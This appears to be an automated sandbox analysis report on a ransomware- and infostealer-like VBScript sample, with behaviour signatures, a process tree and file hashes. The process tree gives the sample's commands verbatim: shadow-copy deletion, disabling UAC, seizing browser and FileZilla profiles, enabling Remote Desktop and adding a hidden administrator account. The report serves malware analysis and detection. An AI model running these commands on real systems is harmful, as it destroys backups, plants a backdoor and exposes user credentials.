Analysis

max time kernel: 25s
max time network: 50s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 19-10-2022 15:20

Static task: static1

Behavioral task: behavioral1
  Sample: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
  Resource: win7-20220901-en

Behavioral task: behavioral2
  Sample: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
  Resource: win10v2004-20220901-en

General

Target: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs
Size: 181KB
MD5: 91f6b90fc19be94b62bb3ec2ff60fc30
SHA1: ed92e88998bf8ed11994291fbdcdebf7272249fa
SHA256: 57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b
SHA512: ac874cbc96dcda332b4bc87b2bde9d81c67300e4aaa6315da45016ac5ff45c40505c98c44311f9ef8c1cbed11d58ac29e34b3d0652a19266348f6715ea8104fc
SSDEEP: 1536:bTRRRRRRRRRRRRRRRRRRRRRRRVjxxxxxxxxxxxxxxxxx96df:bD6F
Malware Config
Signatures

Modifies visibility of hidden/system files in Explorer (2 TTPs, 1 IoC)
Processes: WScript.exe
- Set value (int): \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" (WScript.exe)

UAC bypass
Processes: reg.exe, reg.exe, reg.exe, reg.exe
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" (reg.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" (reg.exe)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Grants admin privileges (1 TTP)
Uses net.exe to modify the user's privileges.

Adds policy Run key to start application (2 TTPs, 4 IoCs)
Processes: WScript.exe, SystemProtection.exe
- Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (WScript.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" (WScript.exe)
- Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run (SystemProtection.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Updates = "\"C:\\system32\\SystemProtection.exe\" /e:VBScript.Encode \"C:\\kernel\\r00t3r\"" (SystemProtection.exe)

Disables RegEdit via registry modification (4 IoCs)
Processes: WScript.exe, WScript.exe, WScript.exe, SystemProtection.exe
- Set value (int): \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" (WScript.exe)
- Set value (int): \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" (WScript.exe)
- Set value (int): \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" (WScript.exe)
- Set value (int): \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "0" (SystemProtection.exe)

Disables Task Manager via registry modification

Executes dropped EXE (1 IoC)
Processes: SystemProtection.exe
- pid 1936 SystemProtection.exe

Modifies Windows Firewall (1 TTP, 1 IoC)

Possible privilege escalation attempt (26 IoCs)
Processes (pid process): 1576 takeown.exe, 1752 takeown.exe, 1572 takeown.exe, 520 takeown.exe, 1032 takeown.exe, 756 takeown.exe, 1100 takeown.exe, 784 takeown.exe, 1488 icacls.exe, 1508 takeown.exe, 1984 takeown.exe, 1496 takeown.exe, 1956 takeown.exe, 1520 takeown.exe, 1156 icacls.exe, 1584 takeown.exe, 1632 takeown.exe, 2024 takeown.exe, 516 takeown.exe, 1988 takeown.exe, 1564 takeown.exe, 1488 icacls.exe, 1144 takeown.exe, 1204 takeown.exe, 2012 takeown.exe, 1096 icacls.exe

Sets file to hidden (1 TTP, 3 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
Processes (pid process): 1760 attrib.exe, 1144 attrib.exe, 1920 attrib.exe

Deletes itself (1 IoC)
Processes (pid process): 1452 cmd.exe

Drops startup file (4 IoCs)
Processes: WScript.exe, SystemProtection.exe
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe (WScript.exe)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe (SystemProtection.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe (SystemProtection.exe)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Media Player.vbe (WScript.exe)

Loads dropped DLL (2 IoCs)
Processes (pid process): 1064 WScript.exe, 1064 WScript.exe

Modifies file permissions (1 TTP, 26 IoCs)
Processes (pid process): 1096 icacls.exe, 756 takeown.exe, 1488 icacls.exe, 1520 takeown.exe, 1156 icacls.exe, 1508 takeown.exe, 1584 takeown.exe, 1100 takeown.exe, 1572 takeown.exe, 1576 takeown.exe, 1144 takeown.exe, 1632 takeown.exe, 1496 takeown.exe, 1752 takeown.exe, 784 takeown.exe, 1032 takeown.exe, 1984 takeown.exe, 516 takeown.exe, 2012 takeown.exe, 1988 takeown.exe, 1564 takeown.exe, 2024 takeown.exe, 520 takeown.exe, 1488 icacls.exe, 1204 takeown.exe, 1956 takeown.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Checks whether UAC is enabled
Processes: WScript.exe, SystemProtection.exe
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (WScript.exe)
- Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (SystemProtection.exe)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Interacts with shadow copies (2 TTPs, 2 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes (pid process): 2028 vssadmin.exe, 2004 vssadmin.exe

Modifies registry class (2 IoCs)
Processes: reg.exe
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon (reg.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\VBEFile\DefaultIcon\ = "C:\\Windows\\system32\\shell32.dll,1" (reg.exe)

Modifies registry key (1 TTP, 6 IoCs)
Processes (pid process): 1588 reg.exe, 1584 reg.exe, 1632 reg.exe, 932 reg.exe, 976 reg.exe, 300 reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes: vssvc.exe, takeown.exe
- Token: SeBackupPrivilege, pid 1436 vssvc.exe
- Token: SeRestorePrivilege, pid 1436 vssvc.exe
- Token: SeAuditPrivilege, pid 1436 vssvc.exe
- Token: SeTakeOwnershipPrivilege, pid 2024 takeown.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes: WScript.exe, cmd.exe, WScript.exe, cmd.exe, cmd.exe, cmd.exe
(source pid/process -> target pid/process; each event was recorded three times unless noted)
- PID 1064 WScript.exe wrote to memory of 648 cmd.exe (x3)
- PID 648 cmd.exe wrote to memory of 1648 mode.com (x3)
- PID 648 cmd.exe wrote to memory of 1376 cmd.exe (x3)
- PID 648 cmd.exe wrote to memory of 1492 find.exe (x3)
- PID 648 cmd.exe wrote to memory of 592 WScript.exe (x3)
- PID 592 WScript.exe wrote to memory of 1144 cmd.exe (x3)
- PID 1144 cmd.exe wrote to memory of 1072 WScript.exe (x3)
- PID 1144 cmd.exe wrote to memory of 1588 reg.exe (x3)
- PID 1144 cmd.exe wrote to memory of 1584 reg.exe (x3)
- PID 648 cmd.exe wrote to memory of 1632 reg.exe (x3)
- PID 648 cmd.exe wrote to memory of 756 find.exe (x3)
- PID 648 cmd.exe wrote to memory of 2028 vssadmin.exe (x3)
- PID 1064 WScript.exe wrote to memory of 1520 cmd.exe (x3)
- PID 1064 WScript.exe wrote to memory of 1452 cmd.exe (x3)
- PID 1520 cmd.exe wrote to memory of 2012 takeown.exe (x3)
- PID 1452 cmd.exe wrote to memory of 1700 cmd.exe (x3)
- PID 1452 cmd.exe wrote to memory of 1748 reg.exe (x3)
- PID 1520 cmd.exe wrote to memory of 1988 takeown.exe (x3)
- PID 1452 cmd.exe wrote to memory of 1184 xcopy.exe (x3)
- PID 1520 cmd.exe wrote to memory of 1676 cacls.exe (x3)
- PID 1452 cmd.exe wrote to memory of 1160 xcopy.exe (x3)
- PID 1520 cmd.exe wrote to memory of 1464 cacls.exe (x1)

System policy modification (1 TTP, 2 IoCs)
Processes: WScript.exe
- Key created: \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate (WScript.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\sdate\sdate = "33" (WScript.exe)

Views/modifies file attributes (1 TTP, 4 IoCs)
Processes (pid process): 1588 attrib.exe, 1144 attrib.exe, 1920 attrib.exe, 1760 attrib.exe
Processes
(process tree; [N] is the nesting depth reported by the sandbox, followed by the image path, the command line, and the signatures triggered by that process)

[1] C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"
    - Adds policy Run key to start application
    - Disables RegEdit via registry modification
    - Drops startup file
    - Loads dropped DLL
    - Checks whether UAC is enabled
    - Suspicious use of WriteProcessMemory
    - System policy modification
  [2] C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\mode.com
        mode con lines=1 cols=14
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" ver "
    [3] C:\Windows\system32\find.exe
        find /i "version 6.1."
    [3] C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c"C:\Users\Admin\AppData\Local\Temp\CPBA.bat"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tp.vbe"
            - Disables RegEdit via registry modification
        [5] C:\Windows\system32\reg.exe
            reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f
            - UAC bypass
            - Modifies registry key
        [5] C:\Windows\system32\reg.exe
            reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f
            - UAC bypass
            - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua
        - Modifies registry key
    [3] C:\Windows\system32\find.exe
        find /i "0x0"
    [3] C:\Windows\system32\vssadmin.exe
        vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\takeown.exe
        takeown /F C:\kernel /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F C:\system32 /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\cacls.exe
        CACLS C:\Kernel /E /T /C /G Admin:F
    [3] C:\Windows\system32\cacls.exe
        CACLS C:\system32 /E /T /C /G Admin:F
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "%userproflie%\cookies" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /F "C:\Windows\system32\drivers" /A /R /D O
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /a /f C:\Windows\System32\wscript.exe
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\takeown.exe
        takeown /a /f C:\Windows\System32\drivers\flpydisk.sys
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F
        - Possible privilege escalation attempt
        - Modifies file permissions
  [2] C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "
      - Deletes itself
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"
    [3] C:\Windows\system32\reg.exe
        reg add "HKCR\VBEFile\DefaultIcon" /v "" /t "REG_SZ" /d "C:\Windows\system32\shell32.dll,1" /f
        - Modifies registry class
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\kernel\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbe" "C:\Users\Admin\AppData\Local\Temp\"
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\Users\Admin\AppData\Local\Temp\"
    [3] C:\Windows\system32\attrib.exe
        attrib -s -h "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs"
        - Views/modifies file attributes
    [3] C:\Windows\system32\attrib.exe
        attrib +s +h "C:\system32"
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\system32\attrib.exe
        attrib +s +h "C:\kernel"
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\system32\"
    [3] C:\Windows\system32\xcopy.exe
        xcopy /C /H /Y /R "C:\Users\Admin\AppData\Local\Temp\57a23c1f468920c8ec393ad8e029d906fb1c8dcf26a83fde132a8919b35cd06b.vbs" "C:\kernel\"
    [3] C:\Windows\system32\attrib.exe
        attrib +s +h "C:\kernel\r00t3r"
        - Sets file to hidden
        - Views/modifies file attributes
  [2] C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"
  [2] C:\system32\SystemProtection.exe
      "C:\system32\SystemProtection.exe" /e:VBScript.Encode "C:\system32\blood.dat
      - Adds policy Run key to start application
      - Disables RegEdit via registry modification
      - Executes dropped EXE
      - Drops startup file
      - Checks whether UAC is enabled
    [3] C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\uac.bat" "
      [4] C:\Windows\system32\mode.com
          mode con lines=1 cols=14
      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" ver "
      [4] C:\Windows\system32\find.exe
          find /i "version 6.1."
      [4] C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ADMIN.vbe"
        [5] C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c"C:\Users\Admin\AppData\Local\Temp\CPBA.bat"
          [6] C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tp.vbe"
              - Disables RegEdit via registry modification
          [6] C:\Windows\system32\reg.exe
              reg add hklm\software\microsoft\windows\currentversion\policies\system /v consentpromptbehavioradmin /t reg_dword /d 0 /f
              - UAC bypass
              - Modifies registry key
          [6] C:\Windows\system32\reg.exe
              reg add hklm\software\microsoft\windows\currentversion\policies\system /v enablelua /t reg_dword /d 0 /f
              - UAC bypass
              - Modifies registry key
      [4] C:\Windows\system32\reg.exe
          reg query hklm\software\microsoft\windows\currentversion\policies\system /v enablelua
          - Modifies registry key
      [4] C:\Windows\system32\find.exe
          find /i "0x0"
      [4] C:\Windows\system32\vssadmin.exe
          vssadmin delete shadows /all /quiet
          - Interacts with shadow copies
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K takeown /F C:\kernel /A /R /D O & takeown /F C:\system32 /A /R /D O & CACLS C:\Kernel /E /T /C /G Admin:F & CACLS C:\system32 /E /T /C /G Admin:F & takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O & takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O & takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O & takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O & takeown /F "%userproflie%\cookies" /A /R /D O & takeown /F "C:\Windows\system32\drivers" /A /R /D O & takeown /a /f C:\Windows\System32\wscript.exe & ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F & takeown /a /f C:\Windows\System32\drivers\flpydisk.sys & ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F & EXIT
      [4] C:\Windows\system32\takeown.exe
          takeown /F C:\kernel /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F C:\system32 /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\cacls.exe
          CACLS C:\Kernel /E /T /C /G Admin:F
      [4] C:\Windows\system32\cacls.exe
          CACLS C:\system32 /E /T /C /G Admin:F
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Mozilla\Firefox\Profiles" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Google\Chrome\User Data" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Thunderbird\Profiles" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\Skype" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Users\Admin\application data\FileZilla" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "%userproflie%\cookies" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /F "C:\Windows\system32\drivers" /A /R /D O
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /a /f C:\Windows\System32\wscript.exe
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe
          ICACLS C:\Windows\System32\wscript.exe /Grant Admin:F
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\takeown.exe
          takeown /a /f C:\Windows\System32\drivers\flpydisk.sys
          - Possible privilege escalation attempt
          - Modifies file permissions
      [4] C:\Windows\system32\icacls.exe
          ICACLS C:\Windows\System32\drivers\flpydisk.sys /Grant Admin:F
          - Possible privilege escalation attempt
          - Modifies file permissions
    [3] C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp.bat" "
      [4] C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c type "C:\system32\blood.dat"
    [3] C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tmp.vbe"
    [3] C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sdf.vbs"
        - Modifies visibility of hidden/system files in Explorer
    [3] C:\Windows\system32\cmd.exe
        cmd /c ""C:\system32\bkr.bat" "
      [4] C:\Windows\system32\netsh.exe
          netsh firewall set service type=remotedesktop mode=enable scope=all
          - Modifies Windows Firewall
      [4] C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
      [4] C:\Windows\system32\net.exe
          net user timalin /delete
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user timalin /delete
      [4] C:\Windows\system32\net.exe
          net user NTUSER /delete
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user NTUSER /delete
      [4] C:\Windows\system32\net.exe
          net user /add HelpAssistant jevoussalue
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 user /add HelpAssistant jevoussalue
      [4] C:\Windows\system32\net.exe
          net localgroup Administrators /add NTUSER
        [5] C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 localgroup Administrators /add NTUSER
      [4] C:\Windows\system32\net.exe
          net localgroup Administrateurs /add NTUSER
      [4] C:\Windows\system32\reg.exe
          reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v HelpAssistant /t REG_DWORD /d 0 /f
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin" & rd/q/s Windows & rd/q/s s4t4n & rd/q/s Microsoft & rd/q/s Securities & cd/d C:\Windows\system32\drivers & ren flpydisk.sys flpydisk.sy_ & del/f/q/a C:\system\*.* & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K CD/D "C:\Users\Admin\COOKIES" & Del/f/q/a *.* & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\Application Data\Skype" & rd/s/q "C:\Users\Admin\Application Data\Skype" & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\opera" & del/f/q opera & EXIT
    [3] C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /K cd/d "C:\Users\Admin\AppData\Roaming\FileZilla" & del/f/q sitemanager.xml & EXIT
  [2] C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /K cd/d "C:\system32" & echo done >>"C:\system32\r0k.rk" & EXIT

[1] C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrateurs /add NTUSER
Network
MITRE ATT&CK Matrix (ATT&CK v6)

Persistence
- Hidden Files and Directories (3)
- Account Manipulation (1)
- Registry Run Keys / Startup Folder (1)
- Modify Existing Service (1)
Downloads
-
C:\Users\Admin\AppData\Local\Temp\ADMIN.vbeFilesize
292B
MD5e11a368aaa023ac803dff823cc918920
SHA13ddb356f147922b4b21068d9c69b9452e437a15c
SHA256037bb39265049b2a383508cefd884ef81a3f25d85f039fae7d92a38fc3f02518
SHA512c7d4dd593f1872eaf3e03f71495c3328a888fbed9c0adb81d56aef08f6c192e14b787063b146eedefdd35ef2d659ef45ea76c499ea819171c763d97c6cfd4a5d
-
C:\Users\Admin\AppData\Local\Temp\ADMIN.vbeFilesize
292B
MD5e11a368aaa023ac803dff823cc918920
SHA13ddb356f147922b4b21068d9c69b9452e437a15c
SHA256037bb39265049b2a383508cefd884ef81a3f25d85f039fae7d92a38fc3f02518
SHA512c7d4dd593f1872eaf3e03f71495c3328a888fbed9c0adb81d56aef08f6c192e14b787063b146eedefdd35ef2d659ef45ea76c499ea819171c763d97c6cfd4a5d
-
C:\Users\Admin\AppData\Local\Temp\CPBA.batFilesize
345B
MD523e76ff91ef416f250a82af89a02769c
SHA13429cc2b37e993bab32a7840618f0c17d9a091e6
SHA25681479eede73470a46ae0ebd8dcf5b97b2eafeb96fc0fe7d69062906f3d133035
SHA512ace889f361eaeb3436d7dd8e4615148f513436073faa8069eb467bc76a9bf1f721b505dddffa0a1c57717becc49ae78851a44d02f740b0de806f5b69c9ffaa62
-
C:\Users\Admin\AppData\Local\Temp\CPBA.batFilesize
345B
MD523e76ff91ef416f250a82af89a02769c
SHA13429cc2b37e993bab32a7840618f0c17d9a091e6
SHA25681479eede73470a46ae0ebd8dcf5b97b2eafeb96fc0fe7d69062906f3d133035
SHA512ace889f361eaeb3436d7dd8e4615148f513436073faa8069eb467bc76a9bf1f721b505dddffa0a1c57717becc49ae78851a44d02f740b0de806f5b69c9ffaa62
-
C:\Users\Admin\AppData\Local\Temp\sdf.vbsFilesize
327B
MD5031c3f01fd6505397cae931dbdf3bfdb
SHA1d20fdee4d60f60b957ccf742130ba56485eae8c6
SHA256b0603aa4a03646b48636653a8f950cf996ef351ff9f909b244b6b79ba15aa63a
SHA512d1c5394d41782b1a896e7a6c63e7ebf5f72c27b2bc7efb4fbe393052374e7939ad2ad3a5d4422b42547d06bb4a955b47591cd5458f3d64e9b2c5614e62132457
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD5659ce8e39a97c207cb7b7772fac6bbbe
SHA1482911c7f725ee815c5cf1a52ff65809be1d83ff
SHA256620daa8294456838bb9323383424bf704bbadbaaa0890ce96cf04d017925e47a
SHA512eb436ee66ef4f36ecc5664dcb5268b6430cd12c085208d84b43fded8a65658c7c305a1109dfd45341c677c892553ca668596267ab916f432ec80ac7bd82dad47
-
C:\Users\Admin\AppData\Local\Temp\tmp.batFilesize
1KB
MD545b08f10911ca031d2b3682a109d64d8
SHA170c69c39ee4dff16594d61e43abd0ae9cba024f4
SHA256db4b9ec1266f1088f610d217d6503aeb2b4b88dfc98b831b257bf1208add5b20
SHA5121d98beca47ca7c7cf2de6e09545bdffb608228cbd1d845a61779fb8665a987f28bd848b3363530215860eb0a6ed0078ebdd88efdf63ac140b5988a621692fb53
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
MD5b4725c8a0d996c389273664a63759590
SHA1219ae39177633b65c451d07fb2fe2ff739811032
SHA2568c2a55ce18955ae8db8d6640c819c3efaa1a2da1150d2a56b24189a09459bcce
SHA512b832de92b3fe9fa0c196ba07862c1222812d289f33dcaffac5832f05e908f5c51cb9490bee5ca9bb31ea3beb76f64ebb5c150ecceedb155bd39495ec88ae190f
-
C:\Users\Admin\AppData\Local\Temp\tmp.vbeFilesize
2KB
